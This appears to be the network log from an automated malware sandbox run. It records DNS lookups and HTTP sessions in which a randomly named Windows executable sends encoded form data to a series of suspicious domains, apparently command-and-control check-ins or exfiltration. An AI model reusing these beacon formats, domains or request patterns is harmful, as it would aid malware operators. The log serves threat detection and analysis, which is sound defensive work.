                                                                                Dec 3, 2024 14:17:03.773994923 CET192.168.2.51.1.1.10x5c23Standard query (0)www.conseilnsaftogo.orgA (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:17:04.789541960 CET192.168.2.51.1.1.10x5c23Standard query (0)www.conseilnsaftogo.orgA (IP address)IN (0x0001)false

                                                                                DNS Answers

                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                Dec 3, 2024 14:13:58.059077024 CET1.1.1.1192.168.2.50x8c27No error (0)www.laohub10.netr0lqcud7.nbnnn.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                Dec 3, 2024 14:13:58.059077024 CET1.1.1.1192.168.2.50x8c27No error (0)r0lqcud7.nbnnn.xyz27.124.4.246A (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:13:58.059077024 CET1.1.1.1192.168.2.50x8c27No error (0)r0lqcud7.nbnnn.xyz202.79.161.151A (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:13:58.059077024 CET1.1.1.1192.168.2.50x8c27No error (0)r0lqcud7.nbnnn.xyz23.225.159.42A (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:13:58.059077024 CET1.1.1.1192.168.2.50x8c27No error (0)r0lqcud7.nbnnn.xyz23.225.160.132A (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:14:16.443689108 CET1.1.1.1192.168.2.50x8abNo error (0)www.5tuohbpzyj9.buzz156.232.181.155A (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:14:17.073652983 CET1.1.1.1192.168.2.50x8abNo error (0)www.5tuohbpzyj9.buzz156.232.181.155A (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:14:32.103765011 CET1.1.1.1192.168.2.50x7045No error (0)www.canadavinreport.site185.27.134.206A (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:14:47.685944080 CET1.1.1.1192.168.2.50x9a0dNo error (0)www.phoenix88.sbsphoenix88.sbsCNAME (Canonical name)IN (0x0001)false
                                                                                Dec 3, 2024 14:14:47.685944080 CET1.1.1.1192.168.2.50x9a0dNo error (0)phoenix88.sbs88.99.61.52A (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:15:02.525659084 CET1.1.1.1192.168.2.50xe4cNo error (0)www.ana-silverco.shop104.21.90.137A (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:15:02.525659084 CET1.1.1.1192.168.2.50xe4cNo error (0)www.ana-silverco.shop172.67.156.195A (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:15:17.406455040 CET1.1.1.1192.168.2.50x3bacNo error (0)www.gadgetre.info209.74.77.107A (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:15:32.183105946 CET1.1.1.1192.168.2.50xd225No error (0)www.acc888ommodate.xyz176.32.38.130A (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:15:47.407557964 CET1.1.1.1192.168.2.50x48f0No error (0)www.nb-shenshi.buzz161.97.168.245A (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:16:02.787623882 CET1.1.1.1192.168.2.50x9430No error (0)www.taxitayninh365.sitetaxitayninh365.siteCNAME (Canonical name)IN (0x0001)false
                                                                                Dec 3, 2024 14:16:02.787623882 CET1.1.1.1192.168.2.50x9430No error (0)taxitayninh365.site103.75.185.22A (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:16:18.220566034 CET1.1.1.1192.168.2.50x551eNo error (0)www.rtpmesinkoin.clickrtpmesinkoin.clickCNAME (Canonical name)IN (0x0001)false
                                                                                Dec 3, 2024 14:16:18.220566034 CET1.1.1.1192.168.2.50x551eNo error (0)rtpmesinkoin.click155.94.253.4A (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:16:33.228538990 CET1.1.1.1192.168.2.50x7267No error (0)www.cortisalincontrol.net208.91.197.27A (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:16:48.343424082 CET1.1.1.1192.168.2.50x7d2eNo error (0)www.carsten.studiocarsten.studioCNAME (Canonical name)IN (0x0001)false
                                                                                Dec 3, 2024 14:16:48.343424082 CET1.1.1.1192.168.2.50x7d2eNo error (0)carsten.studio217.160.0.200A (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:17:04.888649940 CET1.1.1.1192.168.2.50x5c23No error (0)www.conseilnsaftogo.orgconseilnsaftogo.orgCNAME (Canonical name)IN (0x0001)false
                                                                                Dec 3, 2024 14:17:04.888649940 CET1.1.1.1192.168.2.50x5c23No error (0)conseilnsaftogo.org154.70.82.246A (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:17:04.927383900 CET1.1.1.1192.168.2.50x5c23No error (0)www.conseilnsaftogo.orgconseilnsaftogo.orgCNAME (Canonical name)IN (0x0001)false
                                                                                Dec 3, 2024 14:17:04.927383900 CET1.1.1.1192.168.2.50x5c23No error (0)conseilnsaftogo.org154.70.82.246A (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:17:05.018323898 CET1.1.1.1192.168.2.50x5c23No error (0)www.conseilnsaftogo.orgconseilnsaftogo.orgCNAME (Canonical name)IN (0x0001)false
                                                                                Dec 3, 2024 14:17:05.018323898 CET1.1.1.1192.168.2.50x5c23No error (0)conseilnsaftogo.org154.70.82.246A (IP address)IN (0x0001)false

                                                                                HTTP Request Dependency Graph

                                                                                • www.laohub10.net
                                                                                • www.5tuohbpzyj9.buzz
                                                                                • www.canadavinreport.site
                                                                                • www.phoenix88.sbs
                                                                                • www.ana-silverco.shop
                                                                                • www.gadgetre.info
                                                                                • www.acc888ommodate.xyz
                                                                                • www.nb-shenshi.buzz
                                                                                • www.taxitayninh365.site
                                                                                • www.rtpmesinkoin.click
                                                                                • www.cortisalincontrol.net
                                                                                • www.carsten.studio
                                                                                • www.conseilnsaftogo.org

                                                                                HTTP Packets

                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                0192.168.2.54975427.124.4.246803680C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:13:58.195678949 CET520OUTGET /8s5b/?dfxXf=5pgPlrExEj&PLpD=CIoU3XkQQhyfpcUgpw2pt4D5rFaewhtqHE31gFJTqo9NSkmYuUT5vLSdoQQ8/MieV/ko0R3BDKl76A9J0JdcXPh9Hn1ejjtAgVduAuRdjiHqSVqAGkyfP7Q6Thm3wMBkWQ== HTTP/1.1
                                                                                Host: www.laohub10.net
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Dec 3, 2024 14:13:59.617350101 CET525INHTTP/1.1 200 OK
                                                                                Server: Apache
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Accept-Ranges: bytes
                                                                                Cache-Control: max-age=86400
                                                                                Age: 1
                                                                                Connection: Close
                                                                                Content-Length: 350
                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f [TRUNCATED]
                                                                                Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?h="+window.location.host;if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1192.168.2.549798156.232.181.155803680C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:14:16.594978094 CET787OUTPOST /abgi/ HTTP/1.1
                                                                                Host: www.5tuohbpzyj9.buzz
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.5tuohbpzyj9.buzz
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.5tuohbpzyj9.buzz/abgi/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Data Raw: 50 4c 70 44 3d 47 71 45 39 64 77 56 65 7a 49 48 62 35 61 4d 6c 59 75 6d 48 52 4e 77 34 34 75 5a 46 4e 69 32 61 53 58 66 52 6a 35 35 36 6c 2f 4d 46 30 54 31 4a 4a 7a 41 70 32 75 4a 54 48 55 61 59 42 6e 79 51 57 46 4c 66 45 4c 56 59 79 52 42 4f 53 4d 47 51 79 78 4b 6b 4e 2b 4b 61 6f 55 6c 39 48 56 62 71 6d 4e 4a 50 45 31 47 6f 66 59 48 69 33 73 44 73 72 43 50 34 56 6d 65 79 47 42 43 49 64 64 75 50 56 42 5a 38 79 77 61 63 6e 4f 35 59 48 75 72 50 38 4d 67 77 58 74 33 34 37 47 63 67 30 6e 53 2b 63 4b 59 32 32 67 67 59 63 31 71 4b 4b 58 62 6e 31 35 47 53 59 77 46 48 43 36 4c 64 57 6c 6a 2f 68 43 68 67 71 6d 6f 3d
                                                                                Data Ascii: PLpD=GqE9dwVezIHb5aMlYumHRNw44uZFNi2aSXfRj556l/MF0T1JJzAp2uJTHUaYBnyQWFLfELVYyRBOSMGQyxKkN+KaoUl9HVbqmNJPE1GofYHi3sDsrCP4VmeyGBCIdduPVBZ8ywacnO5YHurP8MgwXt347Gcg0nS+cKY22ggYc1qKKXbn15GSYwFHC6LdWlj/hChgqmo=


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                2192.168.2.549805156.232.181.155803680C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:14:19.256313086 CET807OUTPOST /abgi/ HTTP/1.1
                                                                                Host: www.5tuohbpzyj9.buzz
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.5tuohbpzyj9.buzz
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.5tuohbpzyj9.buzz/abgi/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Data Raw: 50 4c 70 44 3d 47 71 45 39 64 77 56 65 7a 49 48 62 35 36 38 6c 4c 66 6d 48 46 64 77 37 39 75 5a 46 44 43 33 52 53 58 44 52 6a 37 49 39 6c 73 34 46 33 32 5a 4a 4b 79 41 70 6c 65 4a 54 54 45 62 53 4d 48 7a 65 57 46 48 58 45 4a 42 59 79 56 52 4f 53 4e 32 51 79 43 53 6e 50 75 4b 59 75 55 6c 37 49 31 62 71 6d 4e 4a 50 45 78 57 43 66 59 50 69 77 63 54 73 6f 6a 50 6e 59 47 65 74 58 42 43 49 5a 64 75 4c 56 42 5a 65 79 31 79 36 6e 4d 42 59 48 75 37 50 79 34 55 2f 5a 64 33 69 6c 32 63 2b 79 6e 6a 47 62 5a 39 35 70 44 70 76 41 6e 65 4f 43 42 71 4e 76 62 4f 36 4c 51 70 2f 53 70 44 71 48 56 43 57 37 68 78 51 30 78 39 45 59 32 4b 76 4a 6b 35 6e 6f 76 50 73 42 32 31 4c 62 77 61 74
                                                                                Data Ascii: PLpD=GqE9dwVezIHb568lLfmHFdw79uZFDC3RSXDRj7I9ls4F32ZJKyApleJTTEbSMHzeWFHXEJBYyVROSN2QyCSnPuKYuUl7I1bqmNJPExWCfYPiwcTsojPnYGetXBCIZduLVBZey1y6nMBYHu7Py4U/Zd3il2c+ynjGbZ95pDpvAneOCBqNvbO6LQp/SpDqHVCW7hxQ0x9EY2KvJk5novPsB21Lbwat


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                3192.168.2.549811156.232.181.155803680C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:14:21.912345886 CET1824OUTPOST /abgi/ HTTP/1.1
                                                                                Host: www.5tuohbpzyj9.buzz
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.5tuohbpzyj9.buzz
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.5tuohbpzyj9.buzz/abgi/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Data Raw: 50 4c 70 44 3d 47 71 45 39 64 77 56 65 7a 49 48 62 35 36 38 6c 4c 66 6d 48 46 64 77 37 39 75 5a 46 44 43 33 52 53 58 44 52 6a 37 49 39 6c 73 67 46 33 45 52 4a 49 52 59 70 30 75 4a 54 51 45 62 54 4d 48 79 43 57 46 76 74 45 4a 4e 6d 79 54 4e 4f 54 76 4f 51 30 7a 53 6e 46 75 4b 59 6a 30 6c 2b 48 56 62 2f 6d 4f 78 44 45 31 79 43 66 59 50 69 77 65 62 73 38 69 50 6e 61 47 65 79 47 42 43 55 64 64 75 7a 56 42 42 6b 79 31 2b 4d 6b 39 68 59 45 50 4c 50 2f 72 38 2f 62 39 33 6b 6b 32 64 74 79 6e 76 5a 62 5a 51 47 70 41 31 46 41 6b 4f 4f 53 32 44 67 31 66 61 5a 57 79 30 62 41 59 48 4a 5a 68 4b 4c 38 51 4e 6e 6f 6a 31 31 59 30 4f 30 45 68 4a 4b 72 65 37 68 54 54 74 51 63 48 2f 66 55 54 74 64 51 6c 4c 76 6c 75 63 63 6b 75 6f 41 70 62 4a 4e 79 42 31 2f 2f 74 7a 32 45 7a 72 4c 77 78 39 6d 6c 56 6f 52 34 38 76 34 66 51 4b 55 35 46 6d 38 67 66 65 6b 41 4b 4a 52 54 74 5a 48 65 4c 55 70 46 53 2f 30 6b 72 6a 4a 7a 39 70 48 76 70 39 59 73 58 4b 52 79 39 74 39 36 4a 4e 70 42 4d 34 53 33 33 30 45 39 45 65 61 45 42 55 4e 68 [TRUNCATED]
                                                                                Data Ascii: PLpD=GqE9dwVezIHb568lLfmHFdw79uZFDC3RSXDRj7I9lsgF3ERJIRYp0uJTQEbTMHyCWFvtEJNmyTNOTvOQ0zSnFuKYj0l+HVb/mOxDE1yCfYPiwebs8iPnaGeyGBCUdduzVBBky1+Mk9hYEPLP/r8/b93kk2dtynvZbZQGpA1FAkOOS2Dg1faZWy0bAYHJZhKL8QNnoj11Y0O0EhJKre7hTTtQcH/fUTtdQlLvlucckuoApbJNyB1//tz2EzrLwx9mlVoR48v4fQKU5Fm8gfekAKJRTtZHeLUpFS/0krjJz9pHvp9YsXKRy9t96JNpBM4S330E9EeaEBUNh6yBhNL+7fNxqnSQ/jim6xMfZS5BbDHBDWKk/BoM+QMGL+Z2NlyPVyOvHlqkm6f3JvCylrIpqs5u0iAablVq28G0qXSksPPc9Z302QktwTTgPBU4czYDJRLmqfbFM8FMvqnTBV/V4WxeyhjJBHaYesPDNg9PoqeWPUP0k91OxIuQvUIV0/hgQknJlnlXQirzhCr29nDP2SI+1YuJWoeK/mRj8KlgqFSUnqW+cS1AeBNTSOcstCMKp5PKG83Tlf1RiupyzF1TUh4ny5qDVPc07k+hIgK26/K8i+oLM1cA0VDhlBplX9VhqBb0eDpt943e+4CYZu4p8pDnJaPxcQZ2b3bZCu2+AaAmKimd+zYzaJH4FdB9fdcYPpkDRiClu0kl3O8DeiDBLmZBQsMRB4jAg9k3/wCy9riBaWZCPe2LXQYvM+ChN7k23YVRLm1AeAB/f2K3I9vRgBnnuJzjNh9s6TbGyPWP0MPdcKLUgwRtQ1VRSRmyDUgLefUHsaj9ZN8/r01nrvFU0pxS0FtslXNF2CguFjKHnlSJIWeASLMzlIkfOvQQddVyAMfMGxG8PrBq2bj766RgGk426r0yFaFWGGLWo8m+sraDDKauhq2loK/8TjKoVbS8030EXLRwZFG7Rt32k/QB8xDYdi/SxHj3SBKjX+46etZbcqJ [TRUNCATED]


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                4192.168.2.549817156.232.181.155803680C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:14:24.564095020 CET524OUTGET /abgi/?PLpD=LosdeFxQ6b3v/d4SJ/OcJ/MY+PVZKDXZGTDYvYgB3fNn+3JFEAQVpOMVTjnjMG/QWUj2NZ16mgwYZq+Px3flCIvo6AFeM2/skelSXUCscL7c+OC82gfnX3ulNzXIVMD/Pg==&dfxXf=5pgPlrExEj HTTP/1.1
                                                                                Host: www.5tuohbpzyj9.buzz
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Dec 3, 2024 14:14:26.423707008 CET709INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Tue, 03 Dec 2024 13:14:26 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 566
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                5192.168.2.549837185.27.134.206803680C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:14:32.242265940 CET799OUTPOST /4d2l/ HTTP/1.1
                                                                                Host: www.canadavinreport.site
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.canadavinreport.site
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.canadavinreport.site/4d2l/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Data Raw: 50 4c 70 44 3d 55 45 70 4a 2b 38 42 77 62 64 33 52 52 4e 55 58 69 68 49 4b 6c 6d 77 73 54 70 65 75 49 77 4a 6c 37 39 4d 2f 4e 2b 34 42 42 4b 4c 38 30 4b 48 54 48 63 4d 70 36 6c 50 46 51 51 6c 69 46 72 75 37 70 77 61 32 71 67 4b 77 6b 33 5a 38 5a 54 50 66 39 74 78 4d 59 5a 30 34 32 4f 4c 52 62 55 64 56 74 58 74 59 4b 62 64 51 37 48 7a 38 64 71 6c 4c 75 2b 39 71 39 56 33 6c 75 59 50 6d 65 75 67 4c 69 69 76 32 6f 73 51 59 71 31 4e 41 55 54 30 64 63 37 6c 4c 66 79 61 67 69 75 41 53 6c 4b 46 5a 48 56 65 75 6e 75 44 75 4e 69 35 39 38 32 6f 36 36 6d 47 41 6e 78 45 38 4a 48 64 46 55 33 55 41 2b 77 77 65 63 4a 51 3d
                                                                                Data Ascii: PLpD=UEpJ+8Bwbd3RRNUXihIKlmwsTpeuIwJl79M/N+4BBKL80KHTHcMp6lPFQQliFru7pwa2qgKwk3Z8ZTPf9txMYZ042OLRbUdVtXtYKbdQ7Hz8dqlLu+9q9V3luYPmeugLiiv2osQYq1NAUT0dc7lLfyagiuASlKFZHVeunuDuNi5982o66mGAnxE8JHdFU3UA+wwecJQ=
                                                                                Dec 3, 2024 14:14:33.522542953 CET685INHTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Tue, 03 Dec 2024 13:14:33 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                Cache-Control: no-cache
                                                                                Content-Encoding: br
                                                                                Data Raw: 31 62 62 0d 0a a1 38 1a 00 20 ff af a9 a7 2b 8f 2e 79 32 55 8c 68 b0 6b 9f 9a 5b a7 f2 c9 de 1d 38 27 ea 44 a7 1a d9 e0 9b 25 27 0e 78 c2 e5 51 37 fa 09 af 3a 87 a7 ff dc 04 ba 76 21 31 08 72 4a 02 53 9e f4 50 ab 34 c0 4f 2a 8e 67 98 14 95 5f f0 fe 02 a3 b2 29 6e 2c 94 2f fb 52 96 13 8c 9c 45 00 00 a7 bc fd fc 2e 20 0f 19 11 70 4e 44 87 06 41 ae 8c 4f 07 0e 4b 1a a8 4a 09 f9 87 b8 ef ff bb 48 3c f9 6d 40 0e 70 ad 80 fd fc a6 60 95 b5 b3 46 cb ba 7e 7e 6e 85 d8 5f fa 7b fa 0f 93 b9 b5 d7 f3 79 b5 bb f4 e1 73 c3 3c f5 16 63 da b6 b2 68 37 e1 7d db 8b 76 18 12 1f da 40 a5 25 7c b6 bf 2f b1 c4 39 c6 24 bc 38 2e a0 41 a0 d2 61 97 b3 21 91 ff f1 f6 2a 0b d0 7f e0 76 aa 75 5d 19 90 a6 52 2a 82 c4 a4 99 4b 63 dd 30 50 6b 23 eb 04 13 5a c7 bc 36 59 9c 24 2e f2 de 67 a9 8b 8d 49 32 23 b5 89 74 a6 eb c4 b4 33 d9 40 ee b1 8e b4 aa a3 c4 81 8e 54 43 45 95 8c 33 a3 93 76 04 a0 53 c8 4c d2 e2 02 26 6e da e8 0a 60 ca e2 df df a5 5f 2c 2d 0e 91 86 04 76 fe fa fe 83 83 77 f3 dd 74 19 38 1a d1 8a d6 84 84 b8 40 cc fc [TRUNCATED]
                                                                                Data Ascii: 1bb8 +.y2Uhk[8'D%'xQ7:v!1rJSP4O*g_)n,/RE. pNDAOKJH<m@p`F~~n_{ys<ch7}v@%|/9$8.Aa!*vu]R*Kc0Pk#Z6Y$.gI2#t3@TCE3vSL&n`_,-vwt8@+bcqEqu5z|oV}&'"ngSV$e*\{^brh@/teGHSK$jWFHe T2-4JS*0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                6192.168.2.549843185.27.134.206803680C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:14:34.913707018 CET819OUTPOST /4d2l/ HTTP/1.1
                                                                                Host: www.canadavinreport.site
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.canadavinreport.site
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.canadavinreport.site/4d2l/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Data Raw: 50 4c 70 44 3d 55 45 70 4a 2b 38 42 77 62 64 33 52 52 70 6f 58 74 67 49 4b 74 6d 77 74 50 5a 65 75 52 67 4a 68 37 39 41 2f 4e 2f 4e 47 42 5a 76 38 31 72 33 54 41 59 59 70 7a 31 50 46 49 67 6c 6e 42 72 75 4f 70 77 57 45 71 68 32 77 6b 7a 78 38 5a 52 58 66 2b 65 70 4e 62 70 30 36 75 2b 4c 54 47 45 64 56 74 58 74 59 4b 62 4a 32 37 48 72 38 64 5a 4e 4c 38 71 70 70 78 31 33 6b 74 59 50 6d 56 4f 67 50 69 69 75 62 6f 6f 51 79 71 32 6c 41 55 53 45 64 62 71 6c 4d 52 43 62 4b 6d 75 41 41 6c 61 63 70 50 6b 57 77 6a 63 36 54 61 52 74 32 35 41 5a 51 67 45 4f 6f 30 52 6f 45 5a 55 56 79 46 48 31 70 6b 54 67 75 43 65 45 49 4b 43 4a 2b 62 6c 75 44 2f 6d 6e 57 2f 44 6f 68 38 35 44 79
                                                                                Data Ascii: PLpD=UEpJ+8Bwbd3RRpoXtgIKtmwtPZeuRgJh79A/N/NGBZv81r3TAYYpz1PFIglnBruOpwWEqh2wkzx8ZRXf+epNbp06u+LTGEdVtXtYKbJ27Hr8dZNL8qppx13ktYPmVOgPiiubooQyq2lAUSEdbqlMRCbKmuAAlacpPkWwjc6TaRt25AZQgEOo0RoEZUVyFH1pkTguCeEIKCJ+bluD/mnW/Doh85Dy
